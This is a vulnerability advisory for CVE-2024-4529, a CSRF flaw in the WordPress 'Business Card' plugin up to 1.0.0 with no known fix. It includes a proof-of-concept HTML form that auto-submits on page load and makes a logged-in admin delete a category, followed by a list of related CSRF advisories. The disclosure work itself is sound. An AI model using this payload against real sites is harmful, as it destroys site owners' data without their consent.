Business Card <= 1.0.0 – Category Deletion via CSRF | CVE 2024-4529 | Plugin Vulnerabilities

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions such as deleting card categories via CSRF attacks

Proof of Concept

Make a logged in admin open an HTML document containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=es-bcard-category" method="post">
        <input type="hidden" name="del_category" value="4">
        <input type="submit" value="Submit" />
    </form>
</body>
```

Affects Plugins

business-card-by-esterox-100

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

082ff0b8-2ecd-4292-832d-0a79e1ba8cb3

Timeline

Publicly Published

2024-05-06 (about 1 year ago)

Added

2024-05-06 (about 1 year ago)

Last Updated

2024-05-06 (about 1 year ago)

Other

Published

Title

Published

2025-01-16

Title

Custom List Table Example <= 1.4.1 - Cross-Site Request Forgery to Reflected Cross-Site Scripting

Published

2023-12-27

Title

Awesome Support < 6.1.6 - Cross-Site Request Forgery

Published

2025-09-05

Title

WordPress Buffer – HYPESocial. Social Media Auto Post, Social Media Auto Publish and Schedule <= 2020.1.0 - Cross-Site Request Forgery

Published

2024-07-11

Title

Google Adsense & Banner Ads by AdsforWP < 1.9.29 - Cross-Site Request Forgery

Published

2024-11-29

Title

eDoc Easy Tables <= 1.29 - Cross-Site Request Forgery to SQL Injection